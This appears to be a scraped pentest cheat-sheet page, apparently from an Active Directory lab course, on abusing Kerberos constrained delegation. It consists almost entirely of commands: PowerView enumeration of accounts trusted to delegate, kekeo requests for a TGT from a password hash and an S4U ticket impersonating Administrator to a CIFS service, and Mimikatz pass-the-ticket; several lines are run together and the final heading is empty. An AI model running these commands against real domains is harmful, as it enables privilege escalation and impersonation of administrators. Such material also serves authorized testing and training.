Constrained Delegation
Enumerate
Get-DomainUser -TrustedToAuth
Get-DomainUser -TrustedToAuth | select samaccountname, msds-allowedtodelegatetoGet-Domaincomputer -TrustedToAuth
Get-Domaincomputer -TrustedToAuth | select samaccountname, msds-allowedtodelegatetoConstrained delegation User
./kekeo.exe
Tgt::ask /user:<username> /domain:<domain> /rc4:<hash>Tgs::s4u /tgt:<tgt> /user:Administrator@<domain> /service:cifs/dcorp-mssql.dollarcorp.moneycorp.localInvoke-Mimikatz -Command '"kerberos::ptt <kirbi file>"'Constrained delegation Computer
Last updated